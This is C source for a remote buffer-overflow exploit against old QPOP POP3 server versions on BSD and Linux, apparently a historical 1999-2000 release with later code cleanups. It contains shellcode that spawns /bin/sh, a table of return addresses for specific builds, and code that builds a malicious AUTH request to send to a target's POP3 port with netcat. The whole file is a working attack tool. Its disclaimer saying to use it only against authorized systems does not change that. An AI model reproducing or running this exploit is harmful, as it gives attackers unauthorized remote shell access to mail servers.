- /* QPOP version 3.0b20 and lower beta versions REMOTE EXPLOIT
- * combination *BSD and Linux
- *
- * sk8@lucid-solutions.com
- * http://www.lucid-solutions.com
- *
- * I have written this to test and demonstrate vulnerabilities on clients'
- * systems only.
- *
- * !!!!!!!!!!DO NOT distribute!!!!!!!!!!
- * (at least not until Qualcomm issues a patch)
- *
 * Use this only against systems you own or are explicitly authorized to
 * test. The author accepts no responsibility for unauthorized use.
- *
- * tested on BSDI 3.0/4.0.1, FreeBSD 2.2.8/3.3, Linux
- *
- * Since popper is usually compiled by the admin, return addresses will vary,
- * but I have included common values. You may have to provide an offset
- * to get it to work on your system.
- *
- * I wrote the exploit near the beginning of November 1999, and unlike some
- * other exploits I've seen since, this one works even on Linux boxes on which
- * inetd was not started from a shell prompt.
- *
 * Usage: run with no arguments to list the version indices. The program
 * writes the crafted AUTH request to stdout; deliver it to the target's
 * POP3 port with a tool such as netcat, supplying an offset if the
 * table address does not match your build.
- */
-
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <sys/time.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
-
/* Fill byte for the whole request: main() memset()s the buffer with it
 * before placing the payload, so any slack is a run of 0x90 bytes (the
 * i386 one-byte NOP). */
unsigned int NOP=0x90;

/* Delta added to the table return address in main(); overridable via
 * argv[2]. A negative command-line value wraps on conversion to unsigned,
 * which is how a downward adjustment is expressed. */
unsigned long offset=0; /* default offset */
-
/* Payload for the BSD rows of verlist (every label not containing "Linux").
 * main() copies strlen() bytes of it to request offset 800, so it must not
 * contain a 0x00 byte; the "/bin/sh" string is embedded as-is. The
 * machine-code bytes are reproduced as published and not re-derived here. */
char bsdsc[]=
"\xeb\x32\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x12\x89\x5e\x17"
"\x88\x5e\x1c\x8d\x1e\x89\x5e\x0e\x31\xc0\xb0\x3b\x8d\x7e"
"\x0e\x89\xfa\x89\xf9\xbf\x10\x10\x10\x10\x29\x7e\xf5\x89"
"\xcf\xeb\x01\xff\x62\x61\x63\x60\xeb\x1b\xe8\xc9\xff\xff"
"\xff/bin/sh\xaa\xaa\xaa\xaa\xff\xff\xff\xbb\xbb\xbb\xbb"
"\xcc\xcc\xcc\xcc\x9a\xaa\xaa\xaa\xaa\x07\xaa";
-
/* Payload used when the chosen verlist label contains "Linux"; main() also
 * shifts the start of the return-address run by 2 (`align`) for this one.
 * Same constraints as bsdsc: measured with strlen(), so no 0x00 byte inside.
 * Bytes reproduced as published, not re-derived here. */
char linuxsc[]=
"\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa"
"\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04"
"\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd9\xff"
"\xff\xff/bin/sh";
-
/* One row of the target table: what the usage listing prints (num,
 * systype), how long the request is (buffer_length) and which address is
 * written after the payload (address; the global `offset` is added at run
 * time). The table ends with a row whose systype is NULL. */
struct version
{
  int num;              /* index shown in the usage listing */
  char* systype;        /* label; main() looks for "Linux" in it with strstr() */
  int buffer_length;    /* total bytes of the request main() builds */
  long address;         /* return address for this build, before `offset` */
};

/* Published table; the first field equals the row's position.
 * The final row is the sentinel main() stops at. */
struct version verlist[] =
{
  {0, "BSDI 2.x/3.x, FreeBSD 2.x", 1001, 0xefbfd56c},   /* bsdsc payload */
  {1, "BSDI 4.x",                  1001, 0x8047564},    /* bsdsc payload */
  {2, "FreeBSD 3.x",               1001, 0xbfbfd3dc},   /* bsdsc payload */
  {3, "Linux",                     990,  0xbfffd304},   /* linuxsc, align 2 */
  {0, NULL, 0, 0}
};
-
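/* Number of rows in verlist before the NULL-labelled sentinel. */
static int version_count(void)
{
  int n = 0;
  while (verlist[n].systype)
    n++;
  return n;
}

/* Parse a complete decimal argument into *out.
 * Returns 0 (and leaves *out unspecified) on empty input, trailing
 * junk or overflow - atoi() reported none of these. */
static int parse_long(const char *s, long *out)
{
  char *end;
  errno = 0;
  *out = strtol(s, &end, 10);
  return end != s && *end == '\0' && errno != ERANGE;
}

/*
 * Build the oversized POP3 AUTH request for the selected verlist row and
 * write it to stdout; the caller delivers it to the target (e.g. netcat).
 *
 *   argv[1]  row index into verlist (run without arguments for the list)
 *   argv[2]  optional signed decimal delta added to the row's address
 *
 * Layout of the buflen-byte request (buflen = row's buffer_length), with
 * every byte not listed here being the NOP fill byte:
 *   [0, 5)                 "AUTH "
 *   [800, 800 + sclen)     the payload for the OS family (bsdsc/linuxsc)
 *   from 800 + sclen + align, every 4 bytes while the index is below
 *   buflen - 4:            the 32-bit return address (address + offset),
 *                          little-endian as the i386 targets expect
 *   [buflen - 2, buflen)   "\n\n"
 *
 * Exits non-zero on a bad argument, a table row too short for the
 * payload, allocation failure or a short write.
 */
int main(int argc, char **argv)
{
  unsigned char *buffer;
  const char *shellcode;
  size_t buflen, sclen, pos;
  unsigned long retaddr;
  long arg;
  int ver, nver, align = 0;

  nver = version_count();

  if (argc < 2) {
    int k;
    printf("Usage: %s version [offset]\n", argv[0]);
    printf("\nAvailable versions:\n");
    for (k = 0; k < nver; k++) {
      printf(" %d: %s\n", verlist[k].num, verlist[k].systype);
    }
    printf("\n");
    exit(EXIT_FAILURE);
  }

  /* The original indexed verlist with an unchecked atoi(): an index past
   * the table read out of bounds, and the sentinel row handed a NULL
   * label to strstr(). */
  if (!parse_long(argv[1], &arg) || arg < 0 || arg >= nver) {
    fprintf(stderr, "%s: unknown version '%s' (run without arguments for the list)\n",
            argv[0], argv[1]);
    exit(EXIT_FAILURE);
  }
  ver = (int)arg;

  if (argc > 2) {
    if (!parse_long(argv[2], &arg)) {
      fprintf(stderr, "%s: bad offset '%s'\n", argv[0], argv[2]);
      exit(EXIT_FAILURE);
    }
    /* A negative delta wraps on conversion, exactly as the original
     * atoi()-to-unsigned assignment did; the sum below wraps back. */
    offset = (unsigned long)arg;
  }

  if (strstr(verlist[ver].systype, "Linux")) {
    shellcode = linuxsc;
    /* Kept from the original; presumably shifts the address run onto the
     * slot this payload expects - not re-derived here. */
    align = 2;
  } else {
    shellcode = bsdsc;
  }

  if (verlist[ver].buffer_length < 4) {
    fprintf(stderr, "%s: table row %d has an unusable buffer length\n", argv[0], ver);
    exit(EXIT_FAILURE);
  }
  buflen = (size_t)verlist[ver].buffer_length;
  sclen = strlen(shellcode);
  if (buflen < 800 + sclen) {
    fprintf(stderr, "%s: table row %d is too short for the payload\n", argv[0], ver);
    exit(EXIT_FAILURE);
  }
  retaddr = (unsigned long)verlist[ver].address + offset;

  buffer = malloc(buflen);
  if (buffer == NULL) {
    perror("malloc");
    exit(EXIT_FAILURE);
  }
  memset(buffer, NOP, buflen);
  memcpy(buffer, "AUTH ", 5);
  memcpy(buffer + 800, shellcode, sclen);

  /* Store the address as exactly four little-endian bytes. The original
   * stored an unsigned long through a cast pointer: four bytes on the
   * i386 hosts it was written on, but eight bytes on an LP64 build, where
   * the last store ran past the end of the allocation. The stride and the
   * stop condition are unchanged, so the byte layout is as before. */
  for (pos = 800 + sclen + align; pos < buflen - 4; pos += 4) {
    buffer[pos]     = (unsigned char)(retaddr & 0xff);
    buffer[pos + 1] = (unsigned char)((retaddr >> 8) & 0xff);
    buffer[pos + 2] = (unsigned char)((retaddr >> 16) & 0xff);
    buffer[pos + 3] = (unsigned char)((retaddr >> 24) & 0xff);
  }
  buffer[buflen - 2] = '\n';
  buffer[buflen - 1] = '\n';

  /* The request carries no terminating NUL, so printf("%s") either read
   * past the allocation (no zero byte anywhere) or truncated at the first
   * zero byte of an offset address. Write the exact length instead,
   * followed by the newline the original format string appended. */
  if (fwrite(buffer, 1, buflen, stdout) != buflen || fputc('\n', stdout) == EOF) {
    perror("write");
    free(buffer);
    exit(EXIT_FAILURE);
  }
  free(buffer);
  return 0;
}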
- /* www.hack.co.za [2000]*/